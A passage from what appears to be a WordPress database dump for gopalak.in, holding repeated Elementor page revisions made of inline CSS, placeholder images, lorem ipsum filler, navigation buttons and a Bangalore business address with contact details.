https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:21:17','2022-09-30 05:51:17','',1373,'https://gopalak.in/?p=1430',0,'revision','',0),(1431,1,'2022-09-30 11:23:32','2022-09-30 05:53:32','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:23:32','2022-09-30 05:53:32','',1373,'https://gopalak.in/?p=1431',0,'revision','',0),(1432,1,'2022-09-30 11:23:32','2022-09-30 05:53:32','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:23:32','2022-09-30 05:53:32','',1373,'https://gopalak.in/?p=1432',0,'revision','',0),(1433,1,'2022-09-30 11:23:32','2022-09-30 05:53:32','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:23:32','2022-09-30 05:53:32','',1373,'https://gopalak.in/?p=1433',0,'revision','',0),(1434,1,'2022-09-30 11:24:28','2022-09-30 05:54:28','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column 